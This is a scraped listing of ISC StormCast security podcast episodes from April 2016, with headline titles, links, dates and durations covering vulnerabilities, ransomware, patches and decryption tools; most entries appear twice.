SAML Federated Identity Vulnerability in Office 365 http://www.economyofmechanism.com/office365-authbypass.html .AS Registry Vulnerable to Direct Object Reference https://isecguy.wordpress.com/2016/04/25/flaw-allowed-anyone-to-modify-take-control-over-any-as-domain/ Driveby Exploit Used to Deliver Android Ransomware https://www.bluecoat.com/security-blog/2016-04-25/android-exploit-delivers-dogspectus-ransomware CryptXXX Decrypt Tool https://support.kaspersky.com/viruses/disinfection/8547?_ga=1.128163404.1397432418.1454514283#block3
4/28/20165 minutes, 19 seconds
Episode Artwork

ISC StormCast for Thursday, April 28th 2016

SAML Federated Identity Vulnerability in Office 365 http://www.economyofmechanism.com/office365-authbypass.html .AS Registry Vulnerable to Direct Object Reference https://isecguy.wordpress.com/2016/04/25/flaw-allowed-anyone-to-modify-take-control-over-any-as-domain/ Driveby Exploit Used to Deliver Android Ransomware https://www.bluecoat.com/security-blog/2016-04-25/android-exploit-delivers-dogspectus-ransomware CryptXXX Decrypt Tool https://support.kaspersky.com/viruses/disinfection/8547?_ga=1.128163404.1397432418.1454514283#block3
4/28/20165 minutes, 19 seconds
Episode Artwork

ISC StormCast for Wednesday, April 27th 2016

OS X Memory Forensics https://isc.sans.edu/forums/diary/An+Introduction+to+Mac+memory+forensics/20989/ Facebook App Used to Delivery Facebook Phish http://news.netcraft.com/archives/2016/04/22/hook-like-and-sinker-facebook-serves-up-its-own-phish.html Android.Spy.277.origin Keeps Being Delivered By Google Play Store Apps http://blog.checkpoint.com/2016/04/22/in-the-wild-google-cant-close-the-door-on-android-malware/ Tool To Replay RDP Sessions From pcaps http://www.contextis.com/resources/blog/rdp-replay-code-release/ Juniper Update http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10727&cat=SIRT_1&actp=LIST RouterSploit Router Exploit Framework https://github.com/reverse-shell/routersploit
4/27/20165 minutes, 2 seconds
Episode Artwork

ISC StormCast for Wednesday, April 27th 2016

OS X Memory Forensics https://isc.sans.edu/forums/diary/An+Introduction+to+Mac+memory+forensics/20989/ Facebook App Used to Delivery Facebook Phish http://news.netcraft.com/archives/2016/04/22/hook-like-and-sinker-facebook-serves-up-its-own-phish.html Android.Spy.277.origin Keeps Being Delivered By Google Play Store Apps http://blog.checkpoint.com/2016/04/22/in-the-wild-google-cant-close-the-door-on-android-malware/ Tool To Replay RDP Sessions From pcaps http://www.contextis.com/resources/blog/rdp-replay-code-release/ Juniper Update http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10727&cat=SIRT_1&actp=LIST RouterSploit Router Exploit Framework https://github.com/reverse-shell/routersploit
4/27/20165 minutes, 2 seconds
Episode Artwork

ISC StormCast for Tuesday, April 26th 2016

Details From the Breach of the Central Bank of Bangladesh http://baesystemsai.blogspot.de/2016/04/two-bytes-to-951m.html Apple Image IO Denial of Service https://www.landaire.net/blog/apple-imageio-denial-of-service/ Text Messages Used to Phish Apple IDs http://www.independent.co.uk/life-style/gadgets-and-tech/news/apple-id-password-expired-expiry-text-website-scam-phishing-a6991126.html Critical HP Data Protector Patch https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988 Armada Collection (or imposter) Making Fake DDoS Threats https://blog.cloudflare.com/empty-ddos-threats-meet-the-armada-collective/
4/26/20165 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, April 26th 2016

Details From the Breach of the Central Bank of Bangladesh http://baesystemsai.blogspot.de/2016/04/two-bytes-to-951m.html Apple Image IO Denial of Service https://www.landaire.net/blog/apple-imageio-denial-of-service/ Text Messages Used to Phish Apple IDs http://www.independent.co.uk/life-style/gadgets-and-tech/news/apple-id-password-expired-expiry-text-website-scam-phishing-a6991126.html Critical HP Data Protector Patch https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988 Armada Collection (or imposter) Making Fake DDoS Threats https://blog.cloudflare.com/empty-ddos-threats-meet-the-armada-collective/
4/26/20165 minutes, 23 seconds
Episode Artwork

ISC StormCast for Monday, April 25th 2016

Angler EK Used to Spread CryptXXX https://isc.sans.edu/forums/diary/Angler+Exploit+Kit+Bedep+and+CryptXXX/20981/ Honeports Powershell Script https://isc.sans.edu/forums/diary/Honeyports+powershell+script/20979/ Online Credit Card Fraud Soars http://www.pymnts.com/fraud-prevention/2016/online-fraud-attack-rates-soar-since-october/ How to Trick Traffic Sensors https://securelist.com/blog/research/74454/how-to-trick-traffic-sensors/ Opera VPN Service Analysis https://gist.github.com/spaze/558b7c4cd81afa7c857381254ae7bd10 https://www.helpnetsecurity.com/2016/04/21/opera-browser-free-vpn/
4/25/20165 minutes, 10 seconds
Episode Artwork

ISC StormCast for Monday, April 25th 2016

Angler EK Used to Spread CryptXXX https://isc.sans.edu/forums/diary/Angler+Exploit+Kit+Bedep+and+CryptXXX/20981/ Honeports Powershell Script https://isc.sans.edu/forums/diary/Honeyports+powershell+script/20979/ Online Credit Card Fraud Soars http://www.pymnts.com/fraud-prevention/2016/online-fraud-attack-rates-soar-since-october/ How to Trick Traffic Sensors https://securelist.com/blog/research/74454/how-to-trick-traffic-sensors/ Opera VPN Service Analysis https://gist.github.com/spaze/558b7c4cd81afa7c857381254ae7bd10 https://www.helpnetsecurity.com/2016/04/21/opera-browser-free-vpn/
4/25/20165 minutes, 10 seconds
Episode Artwork

ISC StormCast for Friday, April 22nd 2016

Accellion Secure File Transfer Vulnerability and Facebook Exploitation http://devco.re/blog/2016/04/21/how-I-hacked-facebook-and-found-someones-backdoor-script-eng-ver/ Application Whitelisting Bypass With regsvr32 http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html New NetworkManager Version Released https://cgit.freedesktop.org/NetworkManager/NetworkManager/plain/NEWS?id=nm-1-2 Opera Includes Free VPN http://www.opera.com/blogs/desktop/2016/04/free-vpn-integrated-opera-for-windows-mac/
4/22/20165 minutes, 18 seconds
Episode Artwork

ISC StormCast for Friday, April 22nd 2016

Accellion Secure File Transfer Vulnerability and Facebook Exploitation http://devco.re/blog/2016/04/21/how-I-hacked-facebook-and-found-someones-backdoor-script-eng-ver/ Application Whitelisting Bypass With regsvr32 http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html New NetworkManager Version Released https://cgit.freedesktop.org/NetworkManager/NetworkManager/plain/NEWS?id=nm-1-2 Opera Includes Free VPN http://www.opera.com/blogs/desktop/2016/04/free-vpn-integrated-opera-for-windows-mac/
4/22/20165 minutes, 18 seconds
Episode Artwork

ISC StormCast for Thursday, April 21st 2016

Decoding Pseudo Darkleech https://isc.sans.edu/forums/diary/Decoding+PseudoDarkleech+1/20969/ Tesla Crypt 4.1 https://www.endgame.com/blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack-chain RansomWhere Protects OS X Users from Ransware https://objective-see.com/products/ransomwhere.html Testing TLS Libraries With TLS Attackers https://github.com/RUB-NDS/TLS-Attacker
4/21/20165 minutes, 13 seconds
Episode Artwork

ISC StormCast for Thursday, April 21st 2016

Decoding Pseudo Darkleech https://isc.sans.edu/forums/diary/Decoding+PseudoDarkleech+1/20969/ Tesla Crypt 4.1 https://www.endgame.com/blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack-chain RansomWhere Protects OS X Users from Ransware https://objective-see.com/products/ransomwhere.html Testing TLS Libraries With TLS Attackers https://github.com/RUB-NDS/TLS-Attacker
4/21/20165 minutes, 13 seconds
Episode Artwork

ISC StormCast for Wednesday, April 20th 2016

Oracle Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html Flash Provides Top Targeted Vulnerabilties for 2015 https://www.solutionary.com/_assets/pdf/research/2015-gtir.pdf Google Publishes Data About Safe Browsing Effectiveness http://static.googleusercontent.com/media/research.google.com/en//pubs/archive/44924.pdf Detecting curl pipes to bash https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/
4/20/20166 minutes, 36 seconds
Episode Artwork

ISC StormCast for Wednesday, April 20th 2016

Oracle Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html Flash Provides Top Targeted Vulnerabilties for 2015 https://www.solutionary.com/_assets/pdf/research/2015-gtir.pdf Google Publishes Data About Safe Browsing Effectiveness http://static.googleusercontent.com/media/research.google.com/en//pubs/archive/44924.pdf Detecting curl pipes to bash https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/
4/20/20166 minutes, 36 seconds
Episode Artwork

ISC StormCast for Tuesday, April 19th 2016

Retefer Banking Malware Appearing Again https://isc.sans.edu/forums/diary/Retefe+is+back+in+town/20957/ Ransomware Switching Focus From Hospitals to Schools http://blog.talosintel.com/2016/04/jboss-backdoor.html git on OS X vulnerable https://rachelbythebay.com/w/2016/04/17/unprotected/
4/19/20165 minutes, 26 seconds
Episode Artwork

ISC StormCast for Tuesday, April 19th 2016

Retefer Banking Malware Appearing Again https://isc.sans.edu/forums/diary/Retefe+is+back+in+town/20957/ Ransomware Switching Focus From Hospitals to Schools http://blog.talosintel.com/2016/04/jboss-backdoor.html git on OS X vulnerable https://rachelbythebay.com/w/2016/04/17/unprotected/
4/19/20165 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, April 18th 2016

Implementing "bash_history" for cmd.exe https://isc.sans.edu/forums/diary/Windows+Command+Line+Persistence/20949/ Mixed encoding in Malicious Documents https://isc.sans.edu/forums/diary/VBS+VBE/20953/ Swedish Air Traffic Control Outage Result of Solar Flares http://www.lfv.se/en/news/news-2016/full-capacity-after-90-minutes-radar-loss Why you should not require password changes https://www.cesg.gov.uk/articles/problems-forcing-regular-password-expiry Bypassing Microsoft Edge XSS Filter http://blog.portswigger.net/2016/04/edge-xss-filter-bypass.html
4/18/20165 minutes, 54 seconds
Episode Artwork

ISC StormCast for Monday, April 18th 2016

Implementing "bash_history" for cmd.exe https://isc.sans.edu/forums/diary/Windows+Command+Line+Persistence/20949/ Mixed encoding in Malicious Documents https://isc.sans.edu/forums/diary/VBS+VBE/20953/ Swedish Air Traffic Control Outage Result of Solar Flares http://www.lfv.se/en/news/news-2016/full-capacity-after-90-minutes-radar-loss Why you should not require password changes https://www.cesg.gov.uk/articles/problems-forcing-regular-password-expiry Bypassing Microsoft Edge XSS Filter http://blog.portswigger.net/2016/04/edge-xss-filter-bypass.html
4/18/20165 minutes, 54 seconds
Episode Artwork

ISC StormCast for Friday, April 15th 2016

Doing HTTP Key Pinning Right https://isc.sans.edu/forums/diary/HTTP+Public+Key+Pinning+How+to+do+it+right/20943/ Apple Ceases Support for Quicktime on Windows https://support.apple.com/HT205771 http://zerodayinitiative.com/advisories/ZDI-16-241/ VMWare Releases Patch for VMWare Client Plugin http://www.vmware.com/security/advisories/VMSA-2016-0004.html Identify Ransomware https://id-ransomware.malwarehunterteam.com Another Fake Flash Update For OS X https://www.intego.com/mac-security-blog/mac-users-attacked-fake-adobe-update/ Chrome 50 Released http://googlechromereleases.blogspot.com/2016/04/stable-channel-update_13.html URL Shorteners Weaken Random URLs http://arxiv.org/pdf/1604.02734v1.pdf
4/15/20165 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, April 15th 2016

Doing HTTP Key Pinning Right https://isc.sans.edu/forums/diary/HTTP+Public+Key+Pinning+How+to+do+it+right/20943/ Apple Ceases Support for Quicktime on Windows https://support.apple.com/HT205771 http://zerodayinitiative.com/advisories/ZDI-16-241/ VMWare Releases Patch for VMWare Client Plugin http://www.vmware.com/security/advisories/VMSA-2016-0004.html Identify Ransomware https://id-ransomware.malwarehunterteam.com Another Fake Flash Update For OS X https://www.intego.com/mac-security-blog/mac-users-attacked-fake-adobe-update/ Chrome 50 Released http://googlechromereleases.blogspot.com/2016/04/stable-channel-update_13.html URL Shorteners Weaken Random URLs http://arxiv.org/pdf/1604.02734v1.pdf
4/15/20165 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, April 14th 2016 - Part 2

PFSense DShield Client Updated for PFSense Version 2.3 https://isc.sans.edu/forums/diary/Updated+PFSense+Client/20937/ JigSaw Decryption Tool Released http://www.bleepingcomputer.com/news/security/jigsaw-ransomware-decrypted-will-delete-your-files-until-you-pay-the-ransom/ Android Bluetooth Pairing Vulnerability https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-android-bluetooth-pairing-bypass-2016-04-12.pdf Samsung Galaxy Phones Expose Modem via USB Port https://github.com/ud2/advisories/tree/master/android/samsung/nocve-2016-0004
4/14/20165 minutes, 21 seconds
Episode Artwork

ISC StormCast for Thursday, April 14th 2016 - Part 2

PFSense DShield Client Updated for PFSense Version 2.3 https://isc.sans.edu/forums/diary/Updated+PFSense+Client/20937/ JigSaw Decryption Tool Released http://www.bleepingcomputer.com/news/security/jigsaw-ransomware-decrypted-will-delete-your-files-until-you-pay-the-ransom/ Android Bluetooth Pairing Vulnerability https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-android-bluetooth-pairing-bypass-2016-04-12.pdf Samsung Galaxy Phones Expose Modem via USB Port https://github.com/ud2/advisories/tree/master/android/samsung/nocve-2016-0004
4/14/20165 minutes, 21 seconds
Episode Artwork

ISC StormCast for Thursday, April 14th 2016

Badlock not as bad https://isc.sans.edu/forums/diary/BadLock+Vulnerability+CVE20162118/20933/ Microsoft Patches https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+Summary+for+April+2016+httpsiscsansedumspatchdayshtmlviewday20160412/20935
4/14/20167 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, April 14th 2016

Badlock not as bad https://isc.sans.edu/forums/diary/BadLock+Vulnerability+CVE20162118/20933/ Microsoft Patches https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+Summary+for+April+2016+httpsiscsansedumspatchdayshtmlviewday20160412/20935
4/14/20167 minutes, 28 seconds
Episode Artwork

ISC StormCast for Tuesday, April 12th 2016

Petyz Ransomware Decrypted https://isc.sans.edu/forums/diary/Tool+Released+to+Decrypt+Petya+Ransomware+Infected+Disks/20929/ Malware Creator Bribes Anti-Virus Vendors http://blog.checkpoint.com/2016/04/08/qihoo-360-just-the-tip-of-the-whitelisted-malware-iceberg/ User Will Plug in USB Drives They Find In The Parking Lot https://www.elie.net/publication/users-really-do-plug-in-usb-drives-they-find Ruby Gems Replacement Vulnerability http://blog.rubygems.org/2016/04/06/gem-replacement-vulnerability-and-mitigation.html
4/12/20165 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, April 12th 2016

Petyz Ransomware Decrypted https://isc.sans.edu/forums/diary/Tool+Released+to+Decrypt+Petya+Ransomware+Infected+Disks/20929/ Malware Creator Bribes Anti-Virus Vendors http://blog.checkpoint.com/2016/04/08/qihoo-360-just-the-tip-of-the-whitelisted-malware-iceberg/ User Will Plug in USB Drives They Find In The Parking Lot https://www.elie.net/publication/users-really-do-plug-in-usb-drives-they-find Ruby Gems Replacement Vulnerability http://blog.rubygems.org/2016/04/06/gem-replacement-vulnerability-and-mitigation.html
4/12/20165 minutes, 39 seconds
Episode Artwork

ISC StormCast for Sunday, April 10th 2016

Flash Releases Pre-Announced Emergency Patch https://helpx.adobe.com/security/products/flash-player/apsb16-10.html http://blog.trendmicro.com/trendlabs-security-intelligence/look-adobe-flash-player-cve-2016-1019-zero-day-vulnerability/ Wordpress Will Start Using SSL https://en.blog.wordpress.com/2016/04/08/https-everywhere-encryption-for-all-wordpress-com-sites/ iMessage Vulnerablitiy Allows Access To Chat History https://www.bishopfox.com/blog/2016/04/if-you-cant-break-crypto-break-the-client-recovery-of-plaintext-imessage-data/ Ubuntu on Windows 10: Not as Insecure as Some Think http://www.pcworld.com/article/3051604/windows/linuxs-deadliest-command-doesnt-faze-bash-on-windows-10.html Special Badlock Webcast https://www.sans.org/webcasts/badlock-102107
4/10/20166 minutes, 33 seconds
Episode Artwork

ISC StormCast for Sunday, April 10th 2016

Flash Releases Pre-Announced Emergency Patch https://helpx.adobe.com/security/products/flash-player/apsb16-10.html http://blog.trendmicro.com/trendlabs-security-intelligence/look-adobe-flash-player-cve-2016-1019-zero-day-vulnerability/ Wordpress Will Start Using SSL https://en.blog.wordpress.com/2016/04/08/https-everywhere-encryption-for-all-wordpress-com-sites/ iMessage Vulnerablitiy Allows Access To Chat History https://www.bishopfox.com/blog/2016/04/if-you-cant-break-crypto-break-the-client-recovery-of-plaintext-imessage-data/ Ubuntu on Windows 10: Not as Insecure as Some Think http://www.pcworld.com/article/3051604/windows/linuxs-deadliest-command-doesnt-faze-bash-on-windows-10.html Special Badlock Webcast https://www.sans.org/webcasts/badlock-102107
4/10/20166 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, April 8th 2016

Google/Facebook CAPTCHA Broken Again https://www.blackhat.com/docs/asia-16/materials/asia-16-Sivakorn-Im-Not-a-Human-Breaking-the-Google-reCAPTCHA-wp.pdf Updated FBI Damage Numbers For Business E-Mail Compromise https://www.fbi.gov/phoenix/press-releases/2016/fbi-warns-of-dramatic-increase-in-business-e-mail-scams PowerWare / PoshCoder Ransomware Decryption https://www.alienvault.com/open-threat-exchange/blog/powerware-or-poshcoder-comparison-and-decryption Leaking Information Via Browser XSS Filters http://www.mbsd.jp/blog/20160407.html
4/8/20165 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, April 8th 2016

Google/Facebook CAPTCHA Broken Again https://www.blackhat.com/docs/asia-16/materials/asia-16-Sivakorn-Im-Not-a-Human-Breaking-the-Google-reCAPTCHA-wp.pdf Updated FBI Damage Numbers For Business E-Mail Compromise https://www.fbi.gov/phoenix/press-releases/2016/fbi-warns-of-dramatic-increase-in-business-e-mail-scams PowerWare / PoshCoder Ransomware Decryption https://www.alienvault.com/open-threat-exchange/blog/powerware-or-poshcoder-comparison-and-decryption Leaking Information Via Browser XSS Filters http://www.mbsd.jp/blog/20160407.html
4/8/20165 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, April 7th 2016

Cisco Security Advisory https://tools.cisco.com/security/center/publicationListing.x#~CiscoSecurityAdvisory OSVDB Closes Down https://blog.osvdb.org/2016/04/05/osvdb-fin/ Apple iOS Passcode Bypass Vulnerability http://seclists.org/fulldisclosure/2016/Apr/19 Securing the Human: Ouch Newsletter https://securingthehuman.sans.org/resources/newsletters/ouch/2016
4/7/20164 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, April 7th 2016

Cisco Security Advisory https://tools.cisco.com/security/center/publicationListing.x#~CiscoSecurityAdvisory OSVDB Closes Down https://blog.osvdb.org/2016/04/05/osvdb-fin/ Apple iOS Passcode Bypass Vulnerability http://seclists.org/fulldisclosure/2016/Apr/19 Securing the Human: Ouch Newsletter https://securingthehuman.sans.org/resources/newsletters/ouch/2016
4/7/20164 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, April 6th 2016

New Microsoft Patches API https://isc.sans.edu/forums/diary/New+Features+for+Microsoft+Patch+Data/20911/ BadLock Webcast https://www.sans.org/webcasts/badlock-102107 Microsoft Single Signon Vulnerable to Token Hijacking https://whitton.xyz/articles/obtaining-tokens-outlook-office-azure-account/ Domino's Pizza Mobile App Payment Bypass http://www.ifc0nfig.com/dominos-pizza-and-payments/
4/6/20166 minutes, 14 seconds
Episode Artwork

ISC StormCast for Wednesday, April 6th 2016

New Microsoft Patches API https://isc.sans.edu/forums/diary/New+Features+for+Microsoft+Patch+Data/20911/ BadLock Webcast https://www.sans.org/webcasts/badlock-102107 Microsoft Single Signon Vulnerable to Token Hijacking https://whitton.xyz/articles/obtaining-tokens-outlook-office-azure-account/ Domino's Pizza Mobile App Payment Bypass http://www.ifc0nfig.com/dominos-pizza-and-payments/
4/6/20166 minutes, 14 seconds
Episode Artwork

ISC StormCast for Tuesday, April 5th 2016

Android Patch Monday https://source.android.com/security/bulletin/2016-04-02.html Jenkins Continous Integration Tool Leaks Anonymous Usage Data https://jenkins.io/blog/2016/03/30/usage-statistics-privacy-advisory/ BREACH Attack Revived/Improved audio: https://regmedia.co.uk/2016/04/04/podcast_beast_2_bhasia.mp3 slides: https://www.blackhat.com/docs/asia-16/materials/asia-16-Karakostas-Practical-New-Developments-In-The-BREACH-Attack.pdf
4/5/20164 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, April 5th 2016

Android Patch Monday https://source.android.com/security/bulletin/2016-04-02.html Jenkins Continous Integration Tool Leaks Anonymous Usage Data https://jenkins.io/blog/2016/03/30/usage-statistics-privacy-advisory/ BREACH Attack Revived/Improved audio: https://regmedia.co.uk/2016/04/04/podcast_beast_2_bhasia.mp3 slides: https://www.blackhat.com/docs/asia-16/materials/asia-16-Karakostas-Practical-New-Developments-In-The-BREACH-Attack.pdf
4/5/20164 minutes, 54 seconds
Episode Artwork

ISC StormCast for Monday, April 4th 2016

Tips for Stopping Ransomware https://isc.sans.edu/forums/diary/Tips+for+Stopping+Ransomware/20903/ Vulnerability in Lhasa decompression library http://blog.talosintel.com/2016/03/vulnerability-lhasa.html How to Decrypt Kimcilware Encrypted Files http://blog.fortinet.com/post/kimcilware-ransomware-how-to-decrypt-encrypted-files-and-who-is-behind-it Fileless Malware http://blog.airbuscybersecurity.com/post/2016/03/FILELESS-MALWARE- -A-BEHAVIOURAL-ANALYSIS-OF-KOVTER-PERSISTENCE
4/4/20165 minutes, 33 seconds
Episode Artwork

ISC StormCast for Monday, April 4th 2016

Tips for Stopping Ransomware https://isc.sans.edu/forums/diary/Tips+for+Stopping+Ransomware/20903/ Vulnerability in Lhasa decompression library http://blog.talosintel.com/2016/03/vulnerability-lhasa.html How to Decrypt Kimcilware Encrypted Files http://blog.fortinet.com/post/kimcilware-ransomware-how-to-decrypt-encrypted-files-and-who-is-behind-it Fileless Malware http://blog.airbuscybersecurity.com/post/2016/03/FILELESS-MALWARE- -A-BEHAVIOURAL-ANALYSIS-OF-KOVTER-PERSISTENCE
4/4/20165 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, April 1st 2016

Trend Micro Leaves Remote Debugger in Password Manager https://bugs.chromium.org/p/project-zero/issues/detail?id=773&can=1&q=trend Several Palo Alto Vulnerabilities https://www.troopers.de/media/filer_public/a5/4d/a54da07e-3780-4f83-b4ac-8c620666a60a/paloalto_troopers.pdf Bypassing The iOS Gatekeeper https://www.checkpoint.com/resources/sidestepper-ios-vulnerability/iOS_Vulnerability_Report_160330_A.pdf
4/1/20165 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, April 1st 2016

Trend Micro Leaves Remote Debugger in Password Manager https://bugs.chromium.org/p/project-zero/issues/detail?id=773&can=1&q=trend Several Palo Alto Vulnerabilities https://www.troopers.de/media/filer_public/a5/4d/a54da07e-3780-4f83-b4ac-8c620666a60a/paloalto_troopers.pdf Bypassing The iOS Gatekeeper https://www.checkpoint.com/resources/sidestepper-ios-vulnerability/iOS_Vulnerability_Report_160330_A.pdf
4/1/20165 minutes, 30 seconds